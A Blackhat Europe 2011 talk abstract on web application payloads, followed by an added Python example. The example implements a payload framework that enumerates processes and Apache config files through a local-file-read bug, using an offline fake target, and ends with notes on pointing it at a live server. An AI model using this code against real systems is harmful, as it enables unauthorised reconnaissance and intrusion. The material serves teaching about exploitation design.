Web Application Payloads presented at Blackhat Europe 2011

by Andrés Pablo Riancho (Rapid7)

Tags: Security

Summary: Web Application Payloads are the evolution of the old-school system call payloads that have been used in memory corruption exploits since the 70's. The basic problem solved by any payload is simple: "I have _access_, what now?". In memory corruption exploits any specific task is easy to perform, because after successful exploitation the attacker controls the CPU and memory and can execute arbitrary system calls to create a new user or run an arbitrary command; but in the Web Application field the attacker is restricted to the "system calls" that the vulnerable Web Application exposes:
* Local File Read - read()
* OS Commanding - exec()
* SQL Injection - read(), write() and possibly exec().
Web Application Payloads are small pieces of code that run on the attacker's box and are translated by the Web application exploit into a combination of GET and POST requests sent to the remote web server.
This talk will explain how we implemented these payloads and the tricks used for post-exploitation, with many demos of payloads such as get_source_code, list_processes, apache_config and get_shell.
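The architecture the abstract describes (payload code runs locally and only ever calls the "system calls" the vulnerability exposes, while a shell object turns each call into an HTTP request) is shown below as an added example; it is not code from the talk or from any particular tool. The HTTP layer is a constructed fake of a PHP page vulnerable to local file read through a `?file=` parameter, backed by an in-memory filesystem so the example runs offline; the hostname, parameter name and file contents are all made up. It carries two of the named payloads (list_processes, apache_config) on the read() syscall alone, and shows why get_shell cannot run on the same bug.

```python
"""Added example (not from the talk or any tool): a minimal web application
payload framework.  A payload is plain Python that may only call the
"syscalls" a shell exposes; the shell maps each call to one HTTP request.
fake_transport is a constructed stand-in for a real GET so it runs offline."""
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Constructed in-memory "remote filesystem" standing in for the target host.
FAKE_FS = {
    "/proc/sys/kernel/pid_max": "32768\n",
    "/proc/1/cmdline": "/sbin/init\x00",
    "/proc/1234/cmdline": "/usr/sbin/apache2\x00-k\x00start\x00",
    "/proc/1300/cmdline": "/usr/sbin/mysqld\x00--user=mysql\x00",
    "/etc/apache2/apache2.conf": 'ServerRoot "/etc/apache2"\nUser www-data\n'
                                 "Include ports.conf\nInclude conf.d/security\n",
    "/etc/apache2/ports.conf": "Listen 80\nListen 443\n",
    "/etc/apache2/conf.d/security": "ServerTokens Prod\n",
}


def fake_transport(url):
    """Constructed stand-in for GET http://target/index.php?file=<path>
    served by a page that does include($_GET['file'])."""
    path = parse_qs(urlparse(url).query).get("file", [""])[0]
    body = FAKE_FS.get(path)
    if body is None:
        return "<html>Warning: include(%s): failed to open stream</html>" % path
    return "<html><body>%s</body></html>" % body


class LocalFileReadShell:
    """The one 'system call' a local file read bug exposes: read()."""

    def __init__(self, base_url, param, transport):
        self.base_url, self.param, self.transport = base_url, param, transport

    def read(self, path):
        """One GET per read(); None when the file could not be included."""
        html = self.transport(self.base_url + "?" + urlencode({self.param: path}))
        # The file comes back wrapped in the page template.  A real exploit has
        # to learn that template's prefix/suffix first; the fake uses <body>.
        m = re.search(r"<body>(.*)</body>", html, re.S)
        return m.group(1) if m else None


class Payload:
    """Payloads run on the attacker's box and see only the shell's syscalls."""
    requires = ()

    def __init__(self, shell):
        missing = [s for s in self.requires if not hasattr(shell, s)]
        if missing:
            raise NotImplementedError("shell lacks syscall(s): " + ", ".join(missing))
        self.shell = shell


class ListProcesses(Payload):
    requires = ("read",)

    def run(self):
        """Enumerate /proc/<pid>/cmdline.  Every pid probed is one HTTP request,
        so bound the loop with the kernel's own pid_max rather than guessing."""
        pid_max = int((self.shell.read("/proc/sys/kernel/pid_max") or "32768").strip())
        procs = {}
        for pid in range(1, pid_max + 1):
            cmdline = self.shell.read("/proc/%d/cmdline" % pid)
            if cmdline:
                procs[pid] = cmdline.rstrip("\x00").split("\x00")
        return procs


class ApacheConfig(Payload):
    requires = ("read",)

    def run(self, main="/etc/apache2/apache2.conf"):
        """Read the main config, then follow Include directives relative to ServerRoot."""
        files, queue, server_root = {}, [main], "/etc/apache2"
        while queue:
            path = queue.pop(0)
            if path in files:
                continue
            content = self.shell.read(path)
            if content is None:
                continue
            files[path] = content
            m = re.search(r'^ServerRoot\s+"?([^"\n]+)"?', content, re.M)
            if m:
                server_root = m.group(1)
            for inc in re.findall(r"^Include(?:Optional)?\s+(\S+)", content, re.M):
                queue.append(inc if inc.startswith("/") else server_root + "/" + inc)
        return files


class GetShell(Payload):
    requires = ("exec",)  # needs OS commanding; a file-read bug cannot provide it


if __name__ == "__main__":
    shell = LocalFileReadShell("http://target.example/index.php", "file", fake_transport)
    for pid, argv in sorted(ListProcesses(shell).run().items()):
        print(pid, " ".join(argv))
    for path in ApacheConfig(shell).run():
        print("fetched", path)
    try:
        GetShell(shell)
    except NotImplementedError as e:
        print("get_shell refused:", e)
```

The `requires` check is the point of the design: the same `ListProcesses` class would work unchanged on top of an OS-commanding shell that also offers `read()`, while `GetShell` is refused up front instead of failing halfway through a request sequence. Pointing this at a live target means replacing `fake_transport` with a real HTTP client and teaching `read()` how to cut the file out of the real page template.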